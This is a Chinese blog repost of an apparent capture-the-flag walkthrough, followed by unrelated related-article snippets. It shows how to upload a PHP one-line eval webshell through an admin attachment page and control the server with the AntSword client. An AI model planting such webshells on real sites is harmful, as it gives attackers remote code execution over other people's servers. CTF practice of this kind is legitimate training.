利用一句话木马获取网站web权限

news/2024/5/9 9:01:22/文章来源:https://blog.csdn.net/weixin_50644728/article/details/108589016

1.登录网站后台,寻找文件上传地方

进入网站管理后台并登录管理员帐户和密码,寻找文件上传点。此网站有多个可上传文件的地方,在这我们选择附件管理页面中的上传附件。
在这里插入图片描述

2.写入一句话木马文件,并上传到网站上

为方便寻找可直接在桌面上新建一个webshell.php文件,以记事本形式打开,在里面写入如下代码并保存。
<?php @eval($_POST['shell']);?>
在这里插入图片描述

回到网站后台附件管理处,将所写的webshell.php文件上传,附件标题可随意命名。
在这里插入图片描述
文件上传成功
在这里插入图片描述

3.寻找文件上传后的地址,找到文件的地址

在后台寻找无果,回到网站前端主页面,寻找上面上传的文件所在地。将页面向下拉,找到“常用文件”,点击左侧的党政文件,找到上传的文件。在文件标题的右侧有一个下载,右击选择在新标签页中打开链接。
在这里插入图片描述
此时在新页面url栏中的就是所上传的文件的地址。
在这里插入图片描述

4.打开蚁剑连接网站上传的文件

打开蚁剑,在空白区右键选择添加数据,在url地址框中输入所上传的文件的地址,在连接密码框中输入shell,然后选择左上角的添加,会显示成功。
在这里插入图片描述

5.在蚁剑点击新添加的数据,找到flag文件

点开
在这里插入图片描述

点开新添加的数据后,点击第一行的文件夹,在右侧文件中下拉到最下方,看到显眼的flag.sh文件
在这里插入图片描述
打开文件,查阅文件内容,发现flag的文件路径。回到原来的文件,在相应的路径中找到并打开文件,发现了flag。回到答题页面将flag提交。
在这里插入图片描述

在这里插入图片描述
在这里插入图片描述

一句话木马可详见下方文章所言。

浅谈一句话

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.luyixian.cn/news_show_856849.aspx

如若内容造成侵权/违法违规/事实不符,请联系dt猫网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

使用LNMP架构部署动态网站环境

使用LNMP架构部署动态网站环境 实验环境 linux操作系统&#xff0c;本文用的是centos7版本的 实验是需要的安装软件包 链接&#xff1a;https://pan.baidu.com/s/11f4Y6GO0ehQDjc-idUJ5lA 提取码&#xff1a;nxfv 复制这段内容后打开百度网盘手机App&#xff0c;操作更方便…

使用 Chrome 开发者工具实现网站快速开发的12个小技巧

转载 chrome迷 http://www.chromi.org/archives/10612 Google 的软件工程师 Pavel Feldman 和 Alexander Pavlov 最近在 Chromium 官方博客公布了一段视频(iOS用户点这里)&#xff0c;讲述了使用 Chrome 开发者工具进行快速网站开发的12个小技巧&#xff0c;对于 Web 开发人员来…

浅谈大型网站的算法和架构(1)

51cto 上个月老大给我们讲解了"浅谈大型网站的算法和架构"&#xff0c;获益匪浅。由于篇幅太多&#xff08;光数据结构大概就有20多种&#xff09;&#xff0c;我也没有办法一下全部吸收&#xff0c;故我边理解&#xff0c;边分章节与大家分享。 这周我查阅资料&a…

setDefaultCloseOperation(JFrame.EXIT_ON_CLOSE);报错

这里关闭窗口提示了错误&#xff0c;查找了好久才发现是是继承错误了&#xff0c;把Frame改为JFrame就可以了。

网站后端使用java还是php多_网站建设时是使用单页面,还是使用多页面设计?...

对于很多客户而言&#xff0c;网站是做单页面还是做多页面设计&#xff0c;是个很纠结的问题。随着移动端还有社交媒体的出现&#xff0c;简简单单响应式的单页面&#xff0c;成为了现在网建设的趋势。传统多页面的设计已经得到了广泛的认知和认可。所以&#xff0c;是选择单页…

怎么做网站在线客服_怎么做网站推广?

网站推广对于大多数网站来说都是一门必修课&#xff0c;目前&#xff0c;互联网上的网站推广方式有很多种&#xff0c;但是最典型的就是搜索引擎推广、电子邮件推广、资源合作推广、信息发布和网络广告推广等方式&#xff0c;无论哪种推广方式对于提升网站知名度和流量具有一定…

win10 IIS网站部署实录

win10 IIS网站部署实录 摘要 启用IIS设置url默认文档http500问题asp错误信息调试asp启用父路径 64位系统下的Access数据库驱动问题 背景 公司购买了一个网站模板&#xff0c;想要在IIS搭建并维护成公司自己的网站。测试环境 操作系统&#xff1a;64位win10专业版(创作者更新)…

Java开发必知道的国外10大网站

1、https://www.google.com/ 2、https://stackoverflow.com 里面包含各种开发遇到的问题及答案&#xff0c;质量比较高。 3、https://github.com/ 免费的开源代码托管网站&#xff0c;包括了许多开源的项目及示例项目等。 4、https://dzone.com/ 提供技术新闻、编程教程、及…

基于GO语言,查询信息类网站部署手册

编译过程 注&#xff1a;服务器版本 [rootsgk privacy]# cat /etc/redhat-release CentOS Linux release 7.6.1810 (Core) 前期准备 所有文件夹放在同一目录&#xff0c;硬盘一定要很大 很大&#xff0c;至少100G以上 [rootsgk ~]# ls anaconda-ks.cfg database database.…

DAY16 - 函数(调用机制、封装、内部函数、回调、递归、网站基本布局)

8.1函数介绍 说明&#xff1a;函数的作用在于对一个功能的封装&#xff0c;封装后在别的页面中引入并调用&#xff0c;可以节省代码量&#xff0c;可以冗余。 8.1.1函数的定义 Function 函数名(【形参1】【,参数2】【,形参n......】){ 要封装到函数的代码; 【return 返回值】; …

手机访问网站自动跳转到手机版

方法一&#xff1a; 目前很多网站已经出现了手机版的网站&#xff0c;手机网站是和互联网上的网站同步更新的&#xff0c;大多数人访问我们的网站是直接访问电脑上的域名&#xff0c;不可能为了手机网站重新记住一个域名&#xff0c;大家都知道&#xff0c;中国人都是比较懒的&…

大型网站技术架构(一)--大型网站架构演化

写在开头&#xff1a;看完chaofanwei关于《大型网站技术架构》一书的阅读笔记&#xff0c;觉得很有用&#xff0c;特此转载留存&#xff0c;对原作者表示感谢 看完了有一本书&#xff0c;就应该有所收获&#xff0c;有所总结&#xff0c;最近把《大型网站技术架构》一书给看完…

songtaste网站歌曲真实URL获取

个人挺喜欢songtaste网站的歌曲的&#xff0c;下载方法也层出不穷&#xff0c;可是作为程序员如果不知其中原理的方法真是羞愧。首先简单点的方法当然有google插件这样的嗅探器了&#xff0c;不过这种工具的原理还不是很了解。今天先总结一下songtaste网站部分歌曲的真实下载链…

(转载)如何用PHP开发一个完整的网站 讲解开发流程 多人开发

引言&#xff1a; 一个清楚的目标定位学习 PHP 才更有动力和方向&#xff0c;约有 30% 的 PHPer 因为学习到一半而没有明确的方向而最终放弃或搁浅。 手头收藏一些好的常用类或方法&#xff0c;能提高我们的开发的速度。如&#xff1a;分页、上传、字符过滤、数据库操作、生成 …

IE兼容性视图无法添加网站

今天遇到公司财务的同事需要用IE登入北京银行网银&#xff0c;登入后显示页面不全&#xff0c;只能设置兼容性视图&#xff0c;结果发现兼容性视图死活无法添加&#xff0c;显示下图&#xff1a; 解决方法&#xff1a; 按下winr打开运行窗口&#xff0c;输入regedit回车打开注…

IE兼容性视图无法添加网站

IE兼容性视图无法添加网站&#xff0c;提示输入一个无效域 &#xff0c;本文将详细介绍如何修复此问题。 解决方法&#xff1a; 按下winr打开运行窗口&#xff0c;输入regedit回车打开注册表编辑器&#xff0c;如下图所示&#xff1a; 定位到HKEY_CURRENT_USER\Software\Micr…

VS2015本地发布以及IIS7部署网站

VS本地发布网站 右击WEB程序集&#xff0c;点击“发布” 在发布选项卡中选择“自定义”,然后输入管理配置文件的名字&#xff0c;点击确定&#xff0c;进入下一步 在发布方法中选择“文件系统”&#xff0c;选择要存储发布文件的位置&#xff0c;点击下一步 在配置中选择“…

CSS+DIV创建一个可爱的小中心网站

有几种不同的方式到垂直中心与 CSS的对象&#xff0c;但它是很困难的选择是正确的。我会告诉你所有我见过的最好的方式&#xff0c;以及如何创建一个可爱的小中心网站。 用CSS垂直居中是不是一件容易的事。有许多不同的方式&#xff0c;在某些浏览器可能无法正常工作。让我们回…

如何正确地优化图像或视频网站

如果&#xff0c;你有一个照片博客或嵌入视频在您的网站有很大的信息和精湛的内容&#xff0c;但有一个问题。搜索引擎无法解释和理解容易&#xff0c;因为他们可以处理文字内容的图片或视频。事实上&#xff0c;有没有文字内容中嵌入视频的网页是相当于一个空白网页的具体原因…

使用HttpSessionListener监听器 监控当前网站在线人数

ServletAPI提供了大量的监听器来监听WEB应用的内部事件&#xff0c;以下简单利用HttpSessionListener监听器来实现监控当前网站的在线人数。 相应代码如下&#xff1a; [java] view plain copy package neo.app.servlet; import java.util.HashSet; import java.util.Map;…